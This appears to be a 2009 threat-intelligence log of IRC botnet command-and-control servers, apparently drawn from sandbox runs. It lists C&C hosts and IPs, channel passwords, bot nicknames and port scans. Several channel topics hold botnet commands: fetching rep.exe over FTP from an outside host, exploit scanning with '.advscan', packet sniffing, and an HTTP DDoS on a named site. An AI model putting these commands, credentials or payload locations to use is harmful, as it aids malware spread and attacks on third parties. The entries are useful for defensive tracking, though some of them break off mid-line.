Month: May 2009

ladroes.hopto.org

Resolved : [ladroes.hopto.org] To [114.143.225.10]
PASS system
NICK n-348385
USER lehapaoz 0 0 :n-348385
USERHOST n-348385
MODE n-348385 -x+B
JOIN #win system
NOTICE n-348385 :.VERSION mIRC v6.12 Khaled Mardam-Bey.
PRIVMSG #win :[MAIN]: Status: Ready. Bot Uptime: 0d 0h 0m.
PRIVMSG #win :[MAIN]: Bot ID: systemBot.
PRIVMSG #win :[Scn]: Exploit Statistics: NetBios: 0, NTPass: 0, Dcom135: 0, Dcom1025: 0, Dcom2: 0, MSSQL: 0, lsass: 0, Total:

94.102.55.189 (NL hosting)

The following Host Name was requested from a host database: 94.102.55.189
There was a new connection established with a remote IRC Server. The generated outbound IRC traffic is provided below:
NICK [00|USA|843633]
USER XP-0033 * 0 :COMPUTERNAME
MODE [00|USA|843633] -ix
JOIN #HowieTeS# KillerZ2009
little scan :
Interesting ports on 94.102.55.189:
Not shown: 1669 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp?
22/tcp open ssh

dddd.burimche.net

– DNS Queries:
Name Query Type Query Result Successful Protocol
dddd.burimche.net DNS_TYPE_A 67.215.1.226 1
– IRC Conversations:
67.215.1.226:4244
Nick: [00|USA|868283]
Username: XP-8912
Server Pass: letmein
Joined Channel: ##bb## with Password bole
Channel Topic for Channel ##bb##: “P http://www-facebooks.com/images.php?=”
Private Message to Channel ##bb##: “msn// Thread Activated: Sending Message.”
Private Message to Channel ##bb##: “msn// Thread Disabled.”

mm1.luckybusy.com (MATRIXIRCD)

Remote Host Port Number
mm1.luckybusy.com 7001
The following Internet Connection was established:
Server Name Server Port Connect as User Connection Password
www.letmeknowwhenyou.org 80 (null) (null)
The following GET request was made:
counter/20080727a/counter.php
There was a new connection established with a remote IRC Server. The generated outbound IRC traffic is provided below:
NICK IM1263Q496068
USER hzrxuror 0 0 :IM1263Q496068
HGDTUH IM1263Q496068
MODE IM1263Q496068

usb.ma7d.com

Remote Host Port Number
usb.ma7d.com 1863
PASS lam
NICK cmfzfd
USER kwghli “” “nii” :kwghli
Resolved : [usb.ma7d.com] To [66.252.5.61]
some interesting ports for h4x0rs on this machine
5800/tcp open vnc-http?
5801/tcp open vnc-http-1?
5802/tcp open vnc-http-2?
5803/tcp open vnc-http-3?
5900/tcp open vnc?
5901/tcp open vnc-1?
5902/tcp open vnc-2?
5903/tcp open vnc-3?
5977/tcp open ncd-pref-tcp?
5978/tcp open ncd-diag-tcp?
5979/tcp open ncd-conf-tcp?
5997/tcp open ncd-pref?
5998/tcp open ncd-diag?
5999/tcp open ncd-conf?
6000/tcp open X11?
6001/tcp

irc.kkk.com (ni from #bottalk lame net)

– IRC Conversations:
117.121.240.14:17901
Nick: [N00|USA|353397]
Username: XP-9448
Server Pass: letmein
Joined Channel: #wut with Password open
Channel Topic for Channel #USA: “.asc -S|.sftp 65.60.55.158 21 nn1zalf zalf rep.exe|.advscan exp_usa 20 3 0 -b -r -e|.advscan exp_xxx 7 3 0 -b -r -e”
Channel Topic for Channel #wut: “.asc -S|.sftp 65.60.55.158 21 nn1zalf zalf rep.exe|.advscan exp_xxx 20 3 0 -b -r

alb.th3kings.net

Remote Host Port Number
alb.th3kings.net 3333
NICK [00|USA|198358]
USER XP-0525 * 0 :COMPUTERNAME
Resolved : [alb.th3kings.net] To [203.154.27.138]
Resolved : [alb.th3kings.net] To [211.192.70.238]
Resolved : [alb.th3kings.net] To [59.120.56.243]

next.hi5photos.mobi

Resolved : [next.hi5photos.mobi] To [86.55.5.122]
Resolved : [next.hi5photos.mobi] To [216.38.54.228]
Remote Host Port Number
next.hi5photos.mobi 4244
Server Name Server Port Connect as User Connection Password
www.facebook.com 80 (null) (null)
The following GET requests were made:
index.html
index.jpg
NICK [00|USA|306350]
USER XP-7944 * 0 :COMPUTERNAME
Interesting ports on vps.selimiserverz.net (216.38.54.228):
Not shown: 1660 closed ports
PORT STATE SERVICE VERSION
1/tcp open tcpwrapped
21/tcp open ftp PureFTPd
25/tcp open

chat-shqip.org (JiMiGj from #bottalk lamer net)

– DNS Queries:
chat-shqip.org
www.dardania.de
www.hasi4ever.com
– HTTP Conversations:
72.20.33.221:80 – [www.dardania.de]
85.192.32.204:80 – [www.hasi4ever.com:80] Request: GET /fr.exe Response: 200 “OK”
– IRC Conversations:
66.54.153.162:13001
Nick: `mcauxb
Username: `mcauxb
Joined Channel: #.r
Joined Channel: #.has with Password hs
Channel Topic for Channel #.has: “`i.join #.r |`sniff.on -s”
Private Message to Channel #.has: “`set jimi jimi -s”
Private Message to Channel #.has: “`ddos.http http://www.dardania.de 500 3 4

infer.infernoslair.com

– DNS Queries:
infer.infernoslair.com
– IRC Conversations: From ANUBIS:1034 to 67.43.236.106:1863
Nick: QNAWaTVS
Username: bipcju
Joined Channel: ##trophy
Channel Topic for Channel ##trophy: “=92CQY7ETbn+YEhznR7ZdYkdu7z34oiLpXxzS”